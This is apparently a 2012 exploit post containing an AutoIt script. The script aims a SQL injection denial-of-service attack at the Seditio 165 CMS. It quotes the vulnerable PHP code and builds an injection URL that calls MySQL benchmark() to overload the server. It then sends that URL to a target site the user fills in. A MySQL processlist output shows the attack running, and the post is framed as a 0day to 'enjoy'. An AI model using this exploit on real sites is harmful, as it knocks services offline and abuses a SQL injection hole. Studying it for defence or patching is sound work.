#cs Seditio 165 (from seditio-eklenti.com) Denial Of Service exploit by AkaStep. We will exploit Sql injection using this exploit and as result we will cause Denial of Service. Mysql server will go down or will overloaded +server will get overloaded(High CPU Load). // Vuln Discovered By AkaStep + exploit By AkaStep. Enjoyyyyy) NOTES Do not login to target site otherwise it will fail to exploit vuln. Exploit Coded in Autoit.See autoitscript.com Details about Vuln:(Magic_Quotes_gpc=off) //seditio165 from seditio-eklenti.com //magic_quotes_gpc =off //system/common.php // 0day by AkaStep //Vulnerable code section if (($rd_loc != "users.php")&&($rd_loc != "message.php")) { $sql_update_online = sed_sql_query("UPDATE sed_redirecter SET rd_location='".$rd_loc.$rd_extra."',rd_lastseen='".time()."' WHERE rd_ip='".$_SERVER["REMOTE_ADDR"]."'"); } /14 April 2012 #ce $targetsite="http://targetsite.tld/"; //target site. Change it to target site. #cs DO NOT TOUCH ANYTHING BELOW #ce $exploit=$targetsite & "/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='" & @IPAddress1 & "',rd_lastseen='"; //Our exploit. $first=$targetsite & '/forums.php'; // our 1'st request will go here. HttpSetUserAgent("I'm Denial Of Service Exploit for Seditio 165 throught sql injection"); //setting user agent 4 fun InetGet($first,'',1);// first request.After this our IP address will be inserted to table sed_redirecter.It is neccessary to exploit. Sleep(1500); //sleeping 1.5 second (*Waiting operation*) HttpSetUserAgent("Exploiting!!!!");//setting our user agent again 4 fun. InetGet($exploit,'',1,1) ; Now exploiting it with *do not wait* responce option.Until now We exploiting sql injection and causing Denial Of Service. Exit; //exit from exploit #cs Here is how this process looks like from server's mysql: worker.com is my own locally spoofed "site" it is not real site anymore.And it is nothing does in this case. mysql> show full processlist \G *************************** 4. row *************************** Id: 5 User: sed165 Host: worker.com:1632 db: sed165 Command: Query Time: 411 State: Updating Info: UPDATE sed_redirecter SET rd_location='plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now()))) ),rd_ip='192.168.0.1',rd_lastseen='',rd_lastseen='1334411851' WHERE rd_ip='192.168.0.1' *************************** 5. row *************************** Id: 6 User: root Host: localhost:2658 db: sed165 Command: Query Time: 0 State: NULL Info: show full processlist *************************** 6. row *************************** Id: 7 User: sed165 Host: worker.com:1633 db: sed165 Command: Query Time: 69 State: Waiting for table level lock Info: UPDATE sed_redirecter SET rd_location='forums.php',rd_lastseen='1334412192' WHERE rd_ip='192.168.0.1' 6 rows in set (0.00 sec) mysql> +++++++Greetz to all++++++++++ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com and to all AA Team. ++++++++++++++++++++++++++++++ Thank you. /AkaStep ^_^ #ce